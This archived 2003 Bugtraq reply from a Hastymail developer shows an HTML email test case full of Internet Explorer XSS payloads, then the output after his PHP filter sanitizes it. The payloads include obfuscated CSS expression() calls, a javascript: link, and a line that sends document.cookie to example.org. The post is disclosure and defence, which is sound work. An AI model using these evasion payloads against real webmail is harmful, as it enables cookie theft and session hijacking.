lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri,  3 Oct 2003 11:56:47 -0500
From: "Jason Munro" <jason@...bev.com>
To: bugtraq@...urityfocus.com
Subject: Re: Webmails + Internet Explorer can create unwanted javascript execution


On October 2, 4:39 pm Jedi/Sector One <j@...eftpd.org> wrote:

FWIW, Hastymail, (a lesser known webmail IMAP client written in PHP i'm
working on) does filter out this nastyness.

HTML before:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>                "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
> <head>
>   <title>Webmail test</title>
>   <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"
> /> </head>
> <body style="width:&#x65;xpres\sion(alert(1))">
>   <style type="text/css">
> h1 {
>   he\ight:&#x65;\xpression(alert(2));
>   bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.c
> ookie+$
> }
>   </style>
>   <h1 style="width:&#x65;xpression(alert(3))">...</h1>
>   <div id="just-for-fun">
>     <a href="&#x6A;avascript:window.open(document.location);"
>        onmouseover="alert(4)">fireworks</a>
>   </div>
> </body>
> </html>

HTML after:
<!-- begin sanitized html -->

  <h1 style="width:idiocy(alert(3))">...</h1>
  <div id="just-for-fun">
    <a>fireworks</a>
  </div>


<!-- end sanitized html -->

The default filter settings do not allow HTML hyperlinks, but this can be
adjusted by the user producing this output for the 'fireworks' link
instead:

<a href="blah:window.open(document.location);" target="_new">fireworks</a>

Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found
here:

http://www.mricon.com/html/phpfilter.html

The filter paramaters are set very tightly to avoid this kind of issue.
While squirrelmail's filter is based on the same engine apparently either
it's not up to date or the params are not set as tight.

\_____ Jason Munro ________________________
 \_____ jason@...bev.com ___________________
  \_____ #hastymail at irc.freenode.net _____
   \_____ http://hastymail.sourceforge.net ___

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ